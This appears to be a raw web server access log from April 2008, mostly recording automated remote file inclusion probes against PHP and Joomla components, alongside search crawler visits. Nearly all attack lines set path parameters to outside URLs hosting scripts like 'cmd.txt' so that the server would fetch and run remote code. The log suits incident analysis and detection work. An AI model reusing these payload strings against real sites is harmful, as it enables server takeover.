72.52.130.1 - - [13/Apr/2008:18:59:16 -0600] "GET /logs/error_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 306 "-" "libwww-perl/5.808"
72.52.130.1 - - [13/Apr/2008:18:59:16 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.808"
72.52.130.1 - - [13/Apr/2008:18:59:16 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.808"
72.52.130.1 - - [13/Apr/2008:18:59:49 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.808"
72.52.130.1 - - [13/Apr/2008:19:00:29 -0600] "GET /logs/access_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 307 "-" "libwww-perl/5.808"
72.52.130.1 - - [13/Apr/2008:19:01:19 -0600] "GET /logs/error_log.20080330//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.808"
72.52.130.1 - - [13/Apr/2008:19:01:19 -0600] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
72.52.130.1 - - [13/Apr/2008:19:01:19 -0600] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
72.52.130.1 - - [13/Apr/2008:19:02:09 -0600] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
72.52.130.1 - - [13/Apr/2008:19:02:35 -0600] "GET /logs/access_log.20080330//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.808"
74.6.22.176 - - [13/Apr/2008:19:04:24 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.188 - - [13/Apr/2008:19:04:25 -0600] "GET / HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.246.30.195 - - [13/Apr/2008:19:05:47 -0600] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
216.246.30.195 - - [13/Apr/2008:19:05:47 -0600] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
87.230.6.49 - - [13/Apr/2008:19:08:06 -0600] "GET /logs//ashnews.php?pathtoashnews=http://www.freewebtown.com/ppll2/romania.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
87.230.6.49 - - [13/Apr/2008:19:08:06 -0600] "GET //ashnews.php?pathtoashnews=http://www.freewebtown.com/ppll2/romania.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.76"
91.185.193.111 - - [13/Apr/2008:19:11:16 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:19:11:16 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
200.201.48.20 - - [13/Apr/2008:19:11:40 -0600] "GET /logs/access_log//modules/TotalCalendar/about.php?inc_dir=uid=33(www-data)%20gid=33(www-data)%20groups=33(www-data)%0A? HTTP/1.0" 404 242 "-" "libwww-perl/5.803"
85.25.148.183 - - [13/Apr/2008:19:12:42 -0600] "GET /index2.php?page=http://www.nameserver11.net/billing2/include/html/.muie/test.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
85.25.148.183 - - [13/Apr/2008:19:12:43 -0600] "GET /logs/index2.php?page=http://www.nameserver11.net/billing2/include/html/.muie/test.txt?? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
212.227.101.118 - - [13/Apr/2008:19:12:46 -0600] "GET /logs//ashnews.php?pathtoashnews=http://www.freewebtown.com/ppll2/romania.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
212.227.101.118 - - [13/Apr/2008:19:12:46 -0600] "GET //ashnews.php?pathtoashnews=http://www.freewebtown.com/ppll2/romania.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
80.253.99.164 - - [13/Apr/2008:19:14:26 -0600] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://140.119.80.185/id2[1]-Naira.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.808"
80.253.99.164 - - [13/Apr/2008:19:14:26 -0600] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://140.119.80.185/id2[1]-Naira.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.808"
216.145.14.142 - - [13/Apr/2008:19:16:03 -0600] "GET /robots.txt HTTP/1.0" 404 204 "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)"
216.145.14.142 - - [13/Apr/2008:19:16:03 -0600] "GET / HTTP/1.1" 200 698 "http://www.whois.sc/evolutionarts.net" "SurveyBot/2.3 (Whois Source)"
80.65.76.195 - - [13/Apr/2008:19:18:15 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yourbesttype.com/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
80.65.76.195 - - [13/Apr/2008:19:18:16 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yourbesttype.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
81.223.85.250 - - [13/Apr/2008:19:19:13 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mba.bus.rmutt.ac.th//appserv/r.txt? HTTP/1.1" 404 274 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
74.54.129.50 - - [13/Apr/2008:19:21:16 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
74.54.129.50 - - [13/Apr/2008:19:21:16 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
81.223.85.250 - - [13/Apr/2008:19:21:25 -0600] "GET //calendar.php?l=http://mba.bus.rmutt.ac.th//appserv/r.txt? HTTP/1.1" 404 231 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.92.158.55 - - [13/Apr/2008:19:25:45 -0600] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.92.158.55 - - [13/Apr/2008:19:25:45 -0600] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
84.246.21.243 - - [13/Apr/2008:19:26:14 -0600] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
84.246.21.243 - - [13/Apr/2008:19:26:14 -0600] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 241 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
216.246.30.195 - - [13/Apr/2008:19:27:39 -0600] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.246.30.195 - - [13/Apr/2008:19:27:40 -0600] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.52.130.178 - - [13/Apr/2008:19:27:54 -0600] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.52.130.178 - - [13/Apr/2008:19:27:54 -0600] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.6.22.154 - - [13/Apr/2008:19:28:08 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.113 - - [13/Apr/2008:19:28:09 -0600] "GET /logs/ HTTP/1.0" 200 1468 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.215.223.191 - - [13/Apr/2008:19:28:42 -0600] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
213.215.223.191 - - [13/Apr/2008:19:28:42 -0600] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
62.75.218.240 - - [13/Apr/2008:19:30:08 -0600] "GET /logs/access_log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.76"
62.75.218.240 - - [13/Apr/2008:19:30:08 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.76"
62.75.218.240 - - [13/Apr/2008:19:30:09 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.76"
62.75.218.240 - - [13/Apr/2008:19:35:24 -0600] "GET /logs/access_log.20080127//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ist-vho.org.tr/yeni/me.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.76"
91.185.193.111 - - [13/Apr/2008:19:36:01 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:19:36:02 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
64.34.173.70 - - [13/Apr/2008:19:38:39 -0600] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.geocities.com/tiaraputri47/cantik.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
64.34.173.70 - - [13/Apr/2008:19:38:39 -0600] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.geocities.com/tiaraputri47/cantik.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
87.118.100.55 - - [13/Apr/2008:19:38:58 -0600] "GET /logs/access_log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
87.118.100.55 - - [13/Apr/2008:19:38:58 -0600] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
87.118.100.55 - - [13/Apr/2008:19:38:58 -0600] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
87.118.100.55 - - [13/Apr/2008:19:39:42 -0600] "GET /logs/error_log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
87.118.100.55 - - [13/Apr/2008:19:41:21 -0600] "GET /logs/access_log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
87.118.100.55 - - [13/Apr/2008:19:41:21 -0600] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
87.118.100.55 - - [13/Apr/2008:19:41:22 -0600] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
87.118.100.55 - - [13/Apr/2008:19:41:23 -0600] "GET /logs/access_log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
87.118.100.55 - - [13/Apr/2008:19:41:24 -0600] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
87.118.100.55 - - [13/Apr/2008:19:41:24 -0600] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
69.93.107.242 - - [13/Apr/2008:19:41:51 -0600] "GET /logs/access_log.20080127//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.holeshot.co.nz/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
69.93.107.242 - - [13/Apr/2008:19:41:51 -0600] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.holeshot.co.nz/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.810"
69.93.107.242 - - [13/Apr/2008:19:41:51 -0600] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.holeshot.co.nz/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.810"
87.118.100.55 - - [13/Apr/2008:19:42:01 -0600] "GET /logs/error_log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
87.118.100.55 - - [13/Apr/2008:19:42:07 -0600] "GET /logs/error_log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yourbesttype.com/id2.txt? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
83.172.138.42 - - [13/Apr/2008:19:43:20 -0600] "GET /scanhttp://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
83.172.138.42 - - [13/Apr/2008:19:43:20 -0600] "GET /scanhttp://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
83.172.138.42 - - [13/Apr/2008:19:43:34 -0600] "GET /scanhttp://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
216.97.43.58 - - [13/Apr/2008:19:44:31 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:44:32 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:44:32 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 241 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:44:32 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 241 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:44:32 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 246 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:44:32 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 246 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:44:35 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:44:35 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:44:36 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 241 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:44:36 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 241 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:44:36 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 246 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:44:36 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 246 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:52:13 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:52:13 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:52:17 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:19:52:17 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
67.195.52.109 - - [13/Apr/2008:19:52:40 -0600] "GET /?M=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.98.140.99 - - [13/Apr/2008:19:52:57 -0600] "GET /logs/access_log.20080127/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://g0tcha.fileave.com/id.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.65"
66.98.140.99 - - [13/Apr/2008:19:52:58 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://g0tcha.fileave.com/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
66.98.140.99 - - [13/Apr/2008:19:52:58 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://g0tcha.fileave.com/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
67.195.51.105 - - [13/Apr/2008:19:53:18 -0600] "GET /urchin/ HTTP/1.0" 200 814 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.105 - - [13/Apr/2008:19:53:28 -0600] "GET /urchin/index.cgi?urc HTTP/1.0" 200 237 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
201.70.98.66 - - [13/Apr/2008:19:53:30 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.70.98.66 - - [13/Apr/2008:19:53:30 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
217.11.249.88 - - [13/Apr/2008:19:53:35 -0600] "GET /logs/access_log.20080127/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://g0tcha.fileave.com/id.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
217.11.249.88 - - [13/Apr/2008:19:53:36 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://g0tcha.fileave.com/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
217.11.249.88 - - [13/Apr/2008:19:53:36 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://g0tcha.fileave.com/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
67.195.51.105 - - [13/Apr/2008:19:53:38 -0600] "GET /urchin/index.cgi?top HTTP/1.0" 200 636 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.105 - - [13/Apr/2008:19:53:48 -0600] "GET /urchin/index.cgi?1101 HTTP/1.0" 200 27338 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.242 - - [13/Apr/2008:19:54:09 -0600] "GET /?M=D HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.242 - - [13/Apr/2008:19:54:18 -0600] "GET /?N=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.37 - - [13/Apr/2008:19:55:20 -0600] "GET /?D=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.17.101.27 - - [13/Apr/2008:19:59:23 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
216.17.101.27 - - [13/Apr/2008:19:59:23 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
216.17.101.27 - - [13/Apr/2008:19:59:24 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
216.17.101.27 - - [13/Apr/2008:19:59:24 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
216.17.101.27 - - [13/Apr/2008:19:59:24 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
216.17.101.27 - - [13/Apr/2008:19:59:24 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
66.98.140.99 - - [13/Apr/2008:20:00:01 -0600] "GET /logs/access_log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://g0tcha.fileave.com/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.65"
65.55.208.115 - - [13/Apr/2008:20:01:02 -0600] "GET /robots.txt HTTP/1.1" 404 216 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.115 - - [13/Apr/2008:20:01:02 -0600] "GET /logs/error_log.20080302 HTTP/1.1" 404 229 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
205.234.193.162 - - [13/Apr/2008:20:01:44 -0600] "GET //administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan7?? HTTP/1.1" 404 270 "-" "libwww-perl/5.808"
204.15.133.133 - - [13/Apr/2008:20:01:53 -0600] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 244 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
204.15.133.133 - - [13/Apr/2008:20:01:53 -0600] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.198.80.33 - - [13/Apr/2008:20:03:51 -0600] "GET /logs/access_log.20080127//modules/vwar/admin/admin.php?vwar_root=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.63"
82.198.80.33 - - [13/Apr/2008:20:03:52 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.63"
